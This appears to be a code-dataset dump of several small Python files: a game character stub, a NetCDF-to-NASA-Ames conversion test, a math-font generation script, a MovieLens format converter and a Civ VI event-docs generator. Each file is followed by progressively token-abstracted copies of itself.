__author__ = 'Jager' from char import Character class Rouge (Character): def special_attack1(self, opponent, hitdamage_callback, specatt_callback): pass # hook method def special_attack2(self, opponent, hitdamage_callback, specatt_callback): pass # hook method def heal(self, target): pass # hook method def regen_resource(self): pass # hook method def full_resource(self): pass
[ "__author__ = 'Jager'\nfrom char import Character\n\nclass Rouge (Character):\n\n def special_attack1(self, opponent, hitdamage_callback, specatt_callback):\n pass # hook method\n\n def special_attack2(self, opponent, hitdamage_callback, specatt_callback):\n pass # hook method\n\n def heal(self, target):\n pass # hook method\n\n def regen_resource(self):\n pass # hook method\n\n\n def full_resource(self):\n pass", "__author__ = 'Jager'\nfrom char import Character\n\n\nclass Rouge(Character):\n\n def special_attack1(self, opponent, hitdamage_callback, specatt_callback):\n pass\n\n def special_attack2(self, opponent, hitdamage_callback, specatt_callback):\n pass\n\n def heal(self, target):\n pass\n\n def regen_resource(self):\n pass\n\n def full_resource(self):\n pass\n", "__author__ = 'Jager'\n<import token>\n\n\nclass Rouge(Character):\n\n def special_attack1(self, opponent, hitdamage_callback, specatt_callback):\n pass\n\n def special_attack2(self, opponent, hitdamage_callback, specatt_callback):\n pass\n\n def heal(self, target):\n pass\n\n def regen_resource(self):\n pass\n\n def full_resource(self):\n pass\n", "<assignment token>\n<import token>\n\n\nclass Rouge(Character):\n\n def special_attack1(self, opponent, hitdamage_callback, specatt_callback):\n pass\n\n def special_attack2(self, opponent, hitdamage_callback, specatt_callback):\n pass\n\n def heal(self, target):\n pass\n\n def regen_resource(self):\n pass\n\n def full_resource(self):\n pass\n", "<assignment token>\n<import token>\n\n\nclass Rouge(Character):\n <function token>\n\n def special_attack2(self, opponent, hitdamage_callback, specatt_callback):\n pass\n\n def heal(self, target):\n pass\n\n def regen_resource(self):\n pass\n\n def full_resource(self):\n pass\n", "<assignment token>\n<import token>\n\n\nclass Rouge(Character):\n <function token>\n\n def special_attack2(self, opponent, hitdamage_callback, specatt_callback):\n pass\n\n def heal(self, target):\n pass\n <function token>\n\n def full_resource(self):\n pass\n", "<assignment token>\n<import token>\n\n\nclass Rouge(Character):\n <function token>\n <function token>\n\n def heal(self, target):\n pass\n <function token>\n\n def full_resource(self):\n pass\n", "<assignment token>\n<import token>\n\n\nclass Rouge(Character):\n <function token>\n <function token>\n\n def heal(self, target):\n pass\n <function token>\n <function token>\n", "<assignment token>\n<import token>\n\n\nclass Rouge(Character):\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n", "<assignment token>\n<import token>\n<class token>\n" ]
false
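Record 73 (`Rouge`, presumably meant as `Rogue`) is the hook side of a template-method design: every method is a stub that the unseen `Character` base is expected to call. A self-contained illustration of that contract, with a stand-in base class since the record's `char` module is not shown:

from abc import ABC, abstractmethod

class Character(ABC):
    # Template method: the turn sequence is fixed, the steps are hooks.
    def take_turn(self, opponent):
        self.regen_resource()
        self.special_attack1(opponent)

    @abstractmethod
    def regen_resource(self): ...

    @abstractmethod
    def special_attack1(self, opponent): ...

class Rogue(Character):
    def regen_resource(self):
        print('energy +20')

    def special_attack1(self, opponent):
        print(f'backstab {opponent}')

Rogue().take_turn('training dummy')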
74
0de657ee173b606ad61d614a6168c00fcd571a70
import os from .common import cached_outputs, data_files, test_outputs import nappy.nc_interface.na_to_nc import nappy.nc_interface.nc_to_na def test_convert_nc_2010_to_na_2310(): ffi_in, ffi_out = (2010, 2310) infile = os.path.join(cached_outputs, f"{ffi_in}.nc") outfile = os.path.join(test_outputs, f"{ffi_out}_from_nc_{ffi_in}.na") # Reading: infile x = nappy.nc_interface.nc_to_na.NCToNA(infile, requested_ffi=ffi_out) # Writing: outfile x.writeNAFiles(outfile, delimiter=",", float_format="%g")
[ "import os\n\nfrom .common import cached_outputs, data_files, test_outputs\n\nimport nappy.nc_interface.na_to_nc\nimport nappy.nc_interface.nc_to_na\n\n\ndef test_convert_nc_2010_to_na_2310():\n ffi_in, ffi_out = (2010, 2310)\n\n infile = os.path.join(cached_outputs, f\"{ffi_in}.nc\")\n outfile = os.path.join(test_outputs, f\"{ffi_out}_from_nc_{ffi_in}.na\")\n\n # Reading: infile\n x = nappy.nc_interface.nc_to_na.NCToNA(infile, requested_ffi=ffi_out)\n\n # Writing: outfile\n x.writeNAFiles(outfile, delimiter=\",\", float_format=\"%g\")\n\n\n", "import os\nfrom .common import cached_outputs, data_files, test_outputs\nimport nappy.nc_interface.na_to_nc\nimport nappy.nc_interface.nc_to_na\n\n\ndef test_convert_nc_2010_to_na_2310():\n ffi_in, ffi_out = 2010, 2310\n infile = os.path.join(cached_outputs, f'{ffi_in}.nc')\n outfile = os.path.join(test_outputs, f'{ffi_out}_from_nc_{ffi_in}.na')\n x = nappy.nc_interface.nc_to_na.NCToNA(infile, requested_ffi=ffi_out)\n x.writeNAFiles(outfile, delimiter=',', float_format='%g')\n", "<import token>\n\n\ndef test_convert_nc_2010_to_na_2310():\n ffi_in, ffi_out = 2010, 2310\n infile = os.path.join(cached_outputs, f'{ffi_in}.nc')\n outfile = os.path.join(test_outputs, f'{ffi_out}_from_nc_{ffi_in}.na')\n x = nappy.nc_interface.nc_to_na.NCToNA(infile, requested_ffi=ffi_out)\n x.writeNAFiles(outfile, delimiter=',', float_format='%g')\n", "<import token>\n<function token>\n" ]
false
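Record 74 tests a single hard-coded FFI pair even though the conversion is driven entirely by `(ffi_in, ffi_out)`. Assuming pytest, the test parametrizes naturally; this sketch reuses only the nappy calls that appear in the record:

import os
import pytest

import nappy.nc_interface.nc_to_na
from .common import cached_outputs, test_outputs

@pytest.mark.parametrize('ffi_in,ffi_out', [(2010, 2310)])   # add pairs as cached .nc files exist
def test_convert_nc_to_na(ffi_in, ffi_out):
    infile = os.path.join(cached_outputs, f'{ffi_in}.nc')
    outfile = os.path.join(test_outputs, f'{ffi_out}_from_nc_{ffi_in}.na')
    x = nappy.nc_interface.nc_to_na.NCToNA(infile, requested_ffi=ffi_out)
    x.writeNAFiles(outfile, delimiter=',', float_format='%g')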
75
06638b361c1cbe92660d242969590dfa45b63a4d
#!/usr/bin/env python3 from utils import mathfont import fontforge v1 = 5 * mathfont.em v2 = 1 * mathfont.em f = mathfont.create("stack-bottomdisplaystyleshiftdown%d-axisheight%d" % (v1, v2), "Copyright (c) 2016 MathML Association") f.math.AxisHeight = v2 f.math.StackBottomDisplayStyleShiftDown = v1 f.math.StackBottomShiftDown = 0 f.math.StackDisplayStyleGapMin = 0 f.math.StackGapMin = 0 f.math.StackTopDisplayStyleShiftUp = 0 f.math.StackTopShiftUp = 0 mathfont.save(f) v1 = 6 * mathfont.em v2 = 1 * mathfont.em f = mathfont.create("stack-bottomshiftdown%d-axisheight%d" % (v1, v2), "Copyright (c) 2016 MathML Association") f.math.AxisHeight = v2 f.math.StackBottomDisplayStyleShiftDown = 0 f.math.StackBottomShiftDown = v1 f.math.StackDisplayStyleGapMin = 0 f.math.StackGapMin = 0 f.math.StackTopDisplayStyleShiftUp = 0 f.math.StackTopShiftUp = 0 mathfont.save(f) v = 4 * mathfont.em f = mathfont.create("stack-displaystylegapmin%d" % v, "Copyright (c) 2016 MathML Association") f.math.AxisHeight = 0 f.math.StackBottomDisplayStyleShiftDown = 0 f.math.StackBottomShiftDown = 0 f.math.StackDisplayStyleGapMin = v f.math.StackGapMin = 0 f.math.StackTopDisplayStyleShiftUp = 0 f.math.StackTopShiftUp = 0 mathfont.save(f) v = 8 * mathfont.em f = mathfont.create("stack-gapmin%d" % v, "Copyright (c) 2016 MathML Association") f.math.AxisHeight = 0 f.math.StackBottomDisplayStyleShiftDown = 0 f.math.StackBottomShiftDown = 0 f.math.StackDisplayStyleGapMin = 0 f.math.StackGapMin = v f.math.StackTopDisplayStyleShiftUp = 0 f.math.StackTopShiftUp = 0 mathfont.save(f) v1 = 3 * mathfont.em v2 = 1 * mathfont.em f = mathfont.create("stack-topdisplaystyleshiftup%d-axisheight%d" % (v1, v2), "Copyright (c) 2016 MathML Association") f.math.AxisHeight = v2 f.math.StackBottomDisplayStyleShiftDown = 0 f.math.StackBottomShiftDown = 0 f.math.StackDisplayStyleGapMin = 0 f.math.StackGapMin = 0 f.math.StackTopDisplayStyleShiftUp = v1 f.math.StackTopShiftUp = 0 mathfont.save(f) v1 = 9 * mathfont.em v2 = 1 * mathfont.em f = mathfont.create("stack-topshiftup%d-axisheight%d" % (v1, v2), "Copyright (c) 2016 MathML Association") f.math.AxisHeight = v2 f.math.StackBottomDisplayStyleShiftDown = 0 f.math.StackBottomShiftDown = 0 f.math.StackDisplayStyleGapMin = 0 f.math.StackGapMin = 0 f.math.StackTopDisplayStyleShiftUp = 0 f.math.StackTopShiftUp = v1 mathfont.save(f)
[ "#!/usr/bin/env python3\n\nfrom utils import mathfont\nimport fontforge\n\nv1 = 5 * mathfont.em\nv2 = 1 * mathfont.em\nf = mathfont.create(\"stack-bottomdisplaystyleshiftdown%d-axisheight%d\" % (v1, v2),\n \"Copyright (c) 2016 MathML Association\")\nf.math.AxisHeight = v2\nf.math.StackBottomDisplayStyleShiftDown = v1\nf.math.StackBottomShiftDown = 0\nf.math.StackDisplayStyleGapMin = 0\nf.math.StackGapMin = 0\nf.math.StackTopDisplayStyleShiftUp = 0\nf.math.StackTopShiftUp = 0\nmathfont.save(f)\n\nv1 = 6 * mathfont.em\nv2 = 1 * mathfont.em\nf = mathfont.create(\"stack-bottomshiftdown%d-axisheight%d\" % (v1, v2),\n \"Copyright (c) 2016 MathML Association\")\nf.math.AxisHeight = v2\nf.math.StackBottomDisplayStyleShiftDown = 0\nf.math.StackBottomShiftDown = v1\nf.math.StackDisplayStyleGapMin = 0\nf.math.StackGapMin = 0\nf.math.StackTopDisplayStyleShiftUp = 0\nf.math.StackTopShiftUp = 0\nmathfont.save(f)\n\nv = 4 * mathfont.em\nf = mathfont.create(\"stack-displaystylegapmin%d\" % v,\n \"Copyright (c) 2016 MathML Association\")\nf.math.AxisHeight = 0\nf.math.StackBottomDisplayStyleShiftDown = 0\nf.math.StackBottomShiftDown = 0\nf.math.StackDisplayStyleGapMin = v\nf.math.StackGapMin = 0\nf.math.StackTopDisplayStyleShiftUp = 0\nf.math.StackTopShiftUp = 0\nmathfont.save(f)\n\nv = 8 * mathfont.em\nf = mathfont.create(\"stack-gapmin%d\" % v,\n \"Copyright (c) 2016 MathML Association\")\nf.math.AxisHeight = 0\nf.math.StackBottomDisplayStyleShiftDown = 0\nf.math.StackBottomShiftDown = 0\nf.math.StackDisplayStyleGapMin = 0\nf.math.StackGapMin = v\nf.math.StackTopDisplayStyleShiftUp = 0\nf.math.StackTopShiftUp = 0\nmathfont.save(f)\n\nv1 = 3 * mathfont.em\nv2 = 1 * mathfont.em\nf = mathfont.create(\"stack-topdisplaystyleshiftup%d-axisheight%d\" % (v1, v2),\n \"Copyright (c) 2016 MathML Association\")\nf.math.AxisHeight = v2\nf.math.StackBottomDisplayStyleShiftDown = 0\nf.math.StackBottomShiftDown = 0\nf.math.StackDisplayStyleGapMin = 0\nf.math.StackGapMin = 0\nf.math.StackTopDisplayStyleShiftUp = v1\nf.math.StackTopShiftUp = 0\nmathfont.save(f)\n\nv1 = 9 * mathfont.em\nv2 = 1 * mathfont.em\nf = mathfont.create(\"stack-topshiftup%d-axisheight%d\" % (v1, v2),\n \"Copyright (c) 2016 MathML Association\")\nf.math.AxisHeight = v2\nf.math.StackBottomDisplayStyleShiftDown = 0\nf.math.StackBottomShiftDown = 0\nf.math.StackDisplayStyleGapMin = 0\nf.math.StackGapMin = 0\nf.math.StackTopDisplayStyleShiftUp = 0\nf.math.StackTopShiftUp = v1\nmathfont.save(f)\n", "from utils import mathfont\nimport fontforge\nv1 = 5 * mathfont.em\nv2 = 1 * mathfont.em\nf = mathfont.create('stack-bottomdisplaystyleshiftdown%d-axisheight%d' % (\n v1, v2), 'Copyright (c) 2016 MathML Association')\nf.math.AxisHeight = v2\nf.math.StackBottomDisplayStyleShiftDown = v1\nf.math.StackBottomShiftDown = 0\nf.math.StackDisplayStyleGapMin = 0\nf.math.StackGapMin = 0\nf.math.StackTopDisplayStyleShiftUp = 0\nf.math.StackTopShiftUp = 0\nmathfont.save(f)\nv1 = 6 * mathfont.em\nv2 = 1 * mathfont.em\nf = mathfont.create('stack-bottomshiftdown%d-axisheight%d' % (v1, v2),\n 'Copyright (c) 2016 MathML Association')\nf.math.AxisHeight = v2\nf.math.StackBottomDisplayStyleShiftDown = 0\nf.math.StackBottomShiftDown = v1\nf.math.StackDisplayStyleGapMin = 0\nf.math.StackGapMin = 0\nf.math.StackTopDisplayStyleShiftUp = 0\nf.math.StackTopShiftUp = 0\nmathfont.save(f)\nv = 4 * mathfont.em\nf = mathfont.create('stack-displaystylegapmin%d' % v,\n 'Copyright (c) 2016 MathML Association')\nf.math.AxisHeight = 0\nf.math.StackBottomDisplayStyleShiftDown = 
0\nf.math.StackBottomShiftDown = 0\nf.math.StackDisplayStyleGapMin = v\nf.math.StackGapMin = 0\nf.math.StackTopDisplayStyleShiftUp = 0\nf.math.StackTopShiftUp = 0\nmathfont.save(f)\nv = 8 * mathfont.em\nf = mathfont.create('stack-gapmin%d' % v,\n 'Copyright (c) 2016 MathML Association')\nf.math.AxisHeight = 0\nf.math.StackBottomDisplayStyleShiftDown = 0\nf.math.StackBottomShiftDown = 0\nf.math.StackDisplayStyleGapMin = 0\nf.math.StackGapMin = v\nf.math.StackTopDisplayStyleShiftUp = 0\nf.math.StackTopShiftUp = 0\nmathfont.save(f)\nv1 = 3 * mathfont.em\nv2 = 1 * mathfont.em\nf = mathfont.create('stack-topdisplaystyleshiftup%d-axisheight%d' % (v1, v2\n ), 'Copyright (c) 2016 MathML Association')\nf.math.AxisHeight = v2\nf.math.StackBottomDisplayStyleShiftDown = 0\nf.math.StackBottomShiftDown = 0\nf.math.StackDisplayStyleGapMin = 0\nf.math.StackGapMin = 0\nf.math.StackTopDisplayStyleShiftUp = v1\nf.math.StackTopShiftUp = 0\nmathfont.save(f)\nv1 = 9 * mathfont.em\nv2 = 1 * mathfont.em\nf = mathfont.create('stack-topshiftup%d-axisheight%d' % (v1, v2),\n 'Copyright (c) 2016 MathML Association')\nf.math.AxisHeight = v2\nf.math.StackBottomDisplayStyleShiftDown = 0\nf.math.StackBottomShiftDown = 0\nf.math.StackDisplayStyleGapMin = 0\nf.math.StackGapMin = 0\nf.math.StackTopDisplayStyleShiftUp = 0\nf.math.StackTopShiftUp = v1\nmathfont.save(f)\n", "<import token>\nv1 = 5 * mathfont.em\nv2 = 1 * mathfont.em\nf = mathfont.create('stack-bottomdisplaystyleshiftdown%d-axisheight%d' % (\n v1, v2), 'Copyright (c) 2016 MathML Association')\nf.math.AxisHeight = v2\nf.math.StackBottomDisplayStyleShiftDown = v1\nf.math.StackBottomShiftDown = 0\nf.math.StackDisplayStyleGapMin = 0\nf.math.StackGapMin = 0\nf.math.StackTopDisplayStyleShiftUp = 0\nf.math.StackTopShiftUp = 0\nmathfont.save(f)\nv1 = 6 * mathfont.em\nv2 = 1 * mathfont.em\nf = mathfont.create('stack-bottomshiftdown%d-axisheight%d' % (v1, v2),\n 'Copyright (c) 2016 MathML Association')\nf.math.AxisHeight = v2\nf.math.StackBottomDisplayStyleShiftDown = 0\nf.math.StackBottomShiftDown = v1\nf.math.StackDisplayStyleGapMin = 0\nf.math.StackGapMin = 0\nf.math.StackTopDisplayStyleShiftUp = 0\nf.math.StackTopShiftUp = 0\nmathfont.save(f)\nv = 4 * mathfont.em\nf = mathfont.create('stack-displaystylegapmin%d' % v,\n 'Copyright (c) 2016 MathML Association')\nf.math.AxisHeight = 0\nf.math.StackBottomDisplayStyleShiftDown = 0\nf.math.StackBottomShiftDown = 0\nf.math.StackDisplayStyleGapMin = v\nf.math.StackGapMin = 0\nf.math.StackTopDisplayStyleShiftUp = 0\nf.math.StackTopShiftUp = 0\nmathfont.save(f)\nv = 8 * mathfont.em\nf = mathfont.create('stack-gapmin%d' % v,\n 'Copyright (c) 2016 MathML Association')\nf.math.AxisHeight = 0\nf.math.StackBottomDisplayStyleShiftDown = 0\nf.math.StackBottomShiftDown = 0\nf.math.StackDisplayStyleGapMin = 0\nf.math.StackGapMin = v\nf.math.StackTopDisplayStyleShiftUp = 0\nf.math.StackTopShiftUp = 0\nmathfont.save(f)\nv1 = 3 * mathfont.em\nv2 = 1 * mathfont.em\nf = mathfont.create('stack-topdisplaystyleshiftup%d-axisheight%d' % (v1, v2\n ), 'Copyright (c) 2016 MathML Association')\nf.math.AxisHeight = v2\nf.math.StackBottomDisplayStyleShiftDown = 0\nf.math.StackBottomShiftDown = 0\nf.math.StackDisplayStyleGapMin = 0\nf.math.StackGapMin = 0\nf.math.StackTopDisplayStyleShiftUp = v1\nf.math.StackTopShiftUp = 0\nmathfont.save(f)\nv1 = 9 * mathfont.em\nv2 = 1 * mathfont.em\nf = mathfont.create('stack-topshiftup%d-axisheight%d' % (v1, v2),\n 'Copyright (c) 2016 MathML Association')\nf.math.AxisHeight = 
v2\nf.math.StackBottomDisplayStyleShiftDown = 0\nf.math.StackBottomShiftDown = 0\nf.math.StackDisplayStyleGapMin = 0\nf.math.StackGapMin = 0\nf.math.StackTopDisplayStyleShiftUp = 0\nf.math.StackTopShiftUp = v1\nmathfont.save(f)\n", "<import token>\n<assignment token>\nmathfont.save(f)\n<assignment token>\nmathfont.save(f)\n<assignment token>\nmathfont.save(f)\n<assignment token>\nmathfont.save(f)\n<assignment token>\nmathfont.save(f)\n<assignment token>\nmathfont.save(f)\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n" ]
false
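Record 75 repeats the same seven MATH-table assignments six times, zeroing all but one or two fields each time. That factors into a single helper that zeroes every stack constant and then applies overrides, using only the `mathfont` calls and field names already present in the record:

from utils import mathfont

STACK_FIELDS = (
    'AxisHeight',
    'StackBottomDisplayStyleShiftDown',
    'StackBottomShiftDown',
    'StackDisplayStyleGapMin',
    'StackGapMin',
    'StackTopDisplayStyleShiftUp',
    'StackTopShiftUp',
)

def make_stack_font(name, **overrides):
    # Zero every stack constant, then set just the fields under test.
    f = mathfont.create(name, 'Copyright (c) 2016 MathML Association')
    for field in STACK_FIELDS:
        setattr(f.math, field, overrides.get(field, 0))
    mathfont.save(f)

v1, v2 = 5 * mathfont.em, 1 * mathfont.em
make_stack_font('stack-bottomdisplaystyleshiftdown%d-axisheight%d' % (v1, v2),
                AxisHeight=v2, StackBottomDisplayStyleShiftDown=v1)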
76
2dd59681a0dcb5d3f1143385100c09c7783babf4
#!/usr/bin/env python # script :: creating a datamodel that fits mahout from ratings.dat ratings_dat = open('../data/movielens-1m/users.dat', 'r') ratings_csv = open('../data/movielens-1m/users.txt', 'w') for line in ratings_dat: arr = line.split('::') new_line = '\t'.join(arr) ratings_csv.write(new_line) ratings_dat.close() ratings_csv.close()
[ "#!/usr/bin/env python\n# script :: creating a datamodel that fits mahout from ratings.dat\n\n\n\nratings_dat = open('../data/movielens-1m/users.dat', 'r')\nratings_csv = open('../data/movielens-1m/users.txt', 'w')\n\nfor line in ratings_dat:\n\tarr = line.split('::')\n\tnew_line = '\\t'.join(arr)\n\n\tratings_csv.write(new_line)\n\nratings_dat.close()\nratings_csv.close()\n", "ratings_dat = open('../data/movielens-1m/users.dat', 'r')\nratings_csv = open('../data/movielens-1m/users.txt', 'w')\nfor line in ratings_dat:\n arr = line.split('::')\n new_line = '\\t'.join(arr)\n ratings_csv.write(new_line)\nratings_dat.close()\nratings_csv.close()\n", "<assignment token>\nfor line in ratings_dat:\n arr = line.split('::')\n new_line = '\\t'.join(arr)\n ratings_csv.write(new_line)\nratings_dat.close()\nratings_csv.close()\n", "<assignment token>\n<code token>\n" ]
false
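Record 76's join trick works because the trailing newline survives on the last field of `line.split('::')`, so each output row keeps its line ending for free. Generalized over the three MovieLens-1M files (the loop and the latin-1 encoding are assumptions, not in the record):

import os

src_dir = '../data/movielens-1m'
for stem in ('users', 'movies', 'ratings'):
    src_path = os.path.join(src_dir, stem + '.dat')
    dst_path = os.path.join(src_dir, stem + '.txt')
    # latin-1 is assumed: ML-1M titles are not valid UTF-8.
    with open(src_path, encoding='latin-1') as src, open(dst_path, 'w', encoding='latin-1') as dst:
        for line in src:
            dst.write('\t'.join(line.split('::')))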
77
5ce98ae241c0982eeb1027ffcff5b770f94ff1a3
import csv import os events = {} eventTypes = set() eventIndices = {} i = 0 with open('Civ VI Modding Companion - Events.csv', newline='') as csvfile: reader = csv.reader(csvfile, delimiter=',', quotechar='|') for row in reader: if i < 4: i += 1 continue eventName = row[3] eventType = "GameEvents" if len(row[10]) > 0 else "Events" argumentName = row[4] argumentType = row[5][1:] try: events[eventName] except Exception: events[eventName] = {'eventType': eventType, 'arguments': []} eventTypes.add(eventType) if argumentName: argumentText = '`' + argumentName if argumentType: argumentText += ' [' + argumentType + ']' argumentText += '`' # argument = {'argumentName': argumentName, 'argumentType': argumentType, 'argumentText': argumentText} events[eventName]['arguments'].append(argumentText) for eventType in eventTypes: filename = '../EventObjects/' + eventType + '.md' os.makedirs(os.path.dirname(filename), exist_ok=True) f = open(filename, "w") eventIndices[eventType] = f f.write('## Static Events\n') f.write('Events can be subscribed by using `' + eventType + '.SomeEvent.Add(SomeFunction)`.\n') f.write('\n') f.write('| Name | Parameters |\n') f.write('|:---- |:--------- |\n') for eventName in events: event = events[eventName] eventType = event['eventType'] eventIndex = eventIndices[eventType] arguments = event['arguments'] # ----------------------- # Create Index Entry # ----------------------- indexEntry = '| [[' + eventType + "." + eventName + ']] | ' if len(arguments) > 0: indexEntry += "<br/>".join(arguments) indexEntry += ' |\n' eventIndex.write(indexEntry) # ----------------------- # Create Event File # ----------------------- fullName = eventType + '.' + eventName filename = '../EventObjects/' + eventType + '/' + eventType + "." + eventName + '.md' os.makedirs(os.path.dirname(filename), exist_ok=True) f = open(filename, "w") f.write('# ' + fullName + "\n") f.write('## Description\n') f.write('TBD\n') f.write('\n') f.write('## Usage\n') argumentsText = (", ".join(arguments)) argumentsText = argumentsText.replace('`', '') f.write('> `' + fullName + '(' + argumentsText + ')`\n\n') f.write('Regular event: you can subscribe to it through `' + fullName + '.Add(<function handler>)`\n') f.write('\n') f.write('### Parameters\n') argumentsList = "\n- ".join(arguments) if len(argumentsList) > 0: argumentsList = '- ' + argumentsList f.write(argumentsList)
[ "import csv\nimport os\n\nevents = {}\neventTypes = set()\neventIndices = {}\n\ni = 0\n\nwith open('Civ VI Modding Companion - Events.csv', newline='') as csvfile:\n\treader = csv.reader(csvfile, delimiter=',', quotechar='|')\n\tfor row in reader:\n\n\t\tif i < 4:\n\t\t\ti += 1\n\t\t\tcontinue\n\n\t\teventName = row[3]\n\t\teventType = \"GameEvents\" if len(row[10]) > 0 else \"Events\"\n\n\t\targumentName = row[4]\n\t\targumentType = row[5][1:]\n\n\t\ttry:\n\t\t\tevents[eventName]\n\t\texcept Exception:\n\t\t\tevents[eventName] = {'eventType': eventType, 'arguments': []}\n\n\t\teventTypes.add(eventType)\n\n\t\tif argumentName:\n\t\t\targumentText = '`' + argumentName\n\t\t\tif argumentType:\n\t\t\t\targumentText += ' [' + argumentType + ']'\n\t\t\targumentText += '`'\n\n\t\t\t# argument = {'argumentName': argumentName, 'argumentType': argumentType, 'argumentText': argumentText}\n\t\t\tevents[eventName]['arguments'].append(argumentText)\n\nfor eventType in eventTypes:\n\n\tfilename = '../EventObjects/' + eventType + '.md'\n\n\tos.makedirs(os.path.dirname(filename), exist_ok=True)\n\tf = open(filename, \"w\")\n\teventIndices[eventType] = f\n\n\tf.write('## Static Events\\n')\n\tf.write('Events can be subscribed by using `' + eventType + '.SomeEvent.Add(SomeFunction)`.\\n')\n\tf.write('\\n')\n\tf.write('| Name | Parameters |\\n')\n\tf.write('|:---- |:--------- |\\n')\n\nfor eventName in events:\n\n\tevent\t\t= events[eventName]\n\teventType\t= event['eventType']\n\teventIndex\t= eventIndices[eventType]\n\n\targuments\t= event['arguments']\n\n\t# -----------------------\n\t# Create Index Entry\n\t# -----------------------\n\tindexEntry = '| [[' + eventType + \".\" + eventName + ']] | '\n\n\tif len(arguments) > 0:\n\t\tindexEntry += \"<br/>\".join(arguments)\n\n\tindexEntry += ' |\\n'\n\teventIndex.write(indexEntry)\n\t# -----------------------\n\t# Create Event File\n\t# -----------------------\n\tfullName = eventType + '.' 
+ eventName\n\n\tfilename = '../EventObjects/' + eventType + '/' + eventType + \".\" + eventName + '.md'\n\tos.makedirs(os.path.dirname(filename), exist_ok=True)\n\tf = open(filename, \"w\")\n\n\tf.write('# ' + fullName + \"\\n\")\n\tf.write('## Description\\n')\n\tf.write('TBD\\n')\n\tf.write('\\n')\n\tf.write('## Usage\\n')\n\n\targumentsText = (\", \".join(arguments))\n\targumentsText = argumentsText.replace('`', '')\n\n\tf.write('> `' + fullName + '(' + argumentsText + ')`\\n\\n')\n\tf.write('Regular event: you can subscribe to it through `' + fullName + '.Add(<function handler>)`\\n')\n\tf.write('\\n')\n\tf.write('### Parameters\\n')\n\n\targumentsList = \"\\n- \".join(arguments)\n\tif len(argumentsList) > 0:\n\t\targumentsList = '- ' + argumentsList\n\n\tf.write(argumentsList)\n", "import csv\nimport os\nevents = {}\neventTypes = set()\neventIndices = {}\ni = 0\nwith open('Civ VI Modding Companion - Events.csv', newline='') as csvfile:\n reader = csv.reader(csvfile, delimiter=',', quotechar='|')\n for row in reader:\n if i < 4:\n i += 1\n continue\n eventName = row[3]\n eventType = 'GameEvents' if len(row[10]) > 0 else 'Events'\n argumentName = row[4]\n argumentType = row[5][1:]\n try:\n events[eventName]\n except Exception:\n events[eventName] = {'eventType': eventType, 'arguments': []}\n eventTypes.add(eventType)\n if argumentName:\n argumentText = '`' + argumentName\n if argumentType:\n argumentText += ' [' + argumentType + ']'\n argumentText += '`'\n events[eventName]['arguments'].append(argumentText)\nfor eventType in eventTypes:\n filename = '../EventObjects/' + eventType + '.md'\n os.makedirs(os.path.dirname(filename), exist_ok=True)\n f = open(filename, 'w')\n eventIndices[eventType] = f\n f.write('## Static Events\\n')\n f.write('Events can be subscribed by using `' + eventType +\n '.SomeEvent.Add(SomeFunction)`.\\n')\n f.write('\\n')\n f.write('| Name | Parameters |\\n')\n f.write('|:---- |:--------- |\\n')\nfor eventName in events:\n event = events[eventName]\n eventType = event['eventType']\n eventIndex = eventIndices[eventType]\n arguments = event['arguments']\n indexEntry = '| [[' + eventType + '.' + eventName + ']] | '\n if len(arguments) > 0:\n indexEntry += '<br/>'.join(arguments)\n indexEntry += ' |\\n'\n eventIndex.write(indexEntry)\n fullName = eventType + '.' + eventName\n filename = ('../EventObjects/' + eventType + '/' + eventType + '.' 
+\n eventName + '.md')\n os.makedirs(os.path.dirname(filename), exist_ok=True)\n f = open(filename, 'w')\n f.write('# ' + fullName + '\\n')\n f.write('## Description\\n')\n f.write('TBD\\n')\n f.write('\\n')\n f.write('## Usage\\n')\n argumentsText = ', '.join(arguments)\n argumentsText = argumentsText.replace('`', '')\n f.write('> `' + fullName + '(' + argumentsText + ')`\\n\\n')\n f.write('Regular event: you can subscribe to it through `' + fullName +\n \"\"\".Add(<function handler>)`\n\"\"\")\n f.write('\\n')\n f.write('### Parameters\\n')\n argumentsList = '\\n- '.join(arguments)\n if len(argumentsList) > 0:\n argumentsList = '- ' + argumentsList\n f.write(argumentsList)\n", "<import token>\nevents = {}\neventTypes = set()\neventIndices = {}\ni = 0\nwith open('Civ VI Modding Companion - Events.csv', newline='') as csvfile:\n reader = csv.reader(csvfile, delimiter=',', quotechar='|')\n for row in reader:\n if i < 4:\n i += 1\n continue\n eventName = row[3]\n eventType = 'GameEvents' if len(row[10]) > 0 else 'Events'\n argumentName = row[4]\n argumentType = row[5][1:]\n try:\n events[eventName]\n except Exception:\n events[eventName] = {'eventType': eventType, 'arguments': []}\n eventTypes.add(eventType)\n if argumentName:\n argumentText = '`' + argumentName\n if argumentType:\n argumentText += ' [' + argumentType + ']'\n argumentText += '`'\n events[eventName]['arguments'].append(argumentText)\nfor eventType in eventTypes:\n filename = '../EventObjects/' + eventType + '.md'\n os.makedirs(os.path.dirname(filename), exist_ok=True)\n f = open(filename, 'w')\n eventIndices[eventType] = f\n f.write('## Static Events\\n')\n f.write('Events can be subscribed by using `' + eventType +\n '.SomeEvent.Add(SomeFunction)`.\\n')\n f.write('\\n')\n f.write('| Name | Parameters |\\n')\n f.write('|:---- |:--------- |\\n')\nfor eventName in events:\n event = events[eventName]\n eventType = event['eventType']\n eventIndex = eventIndices[eventType]\n arguments = event['arguments']\n indexEntry = '| [[' + eventType + '.' + eventName + ']] | '\n if len(arguments) > 0:\n indexEntry += '<br/>'.join(arguments)\n indexEntry += ' |\\n'\n eventIndex.write(indexEntry)\n fullName = eventType + '.' + eventName\n filename = ('../EventObjects/' + eventType + '/' + eventType + '.' 
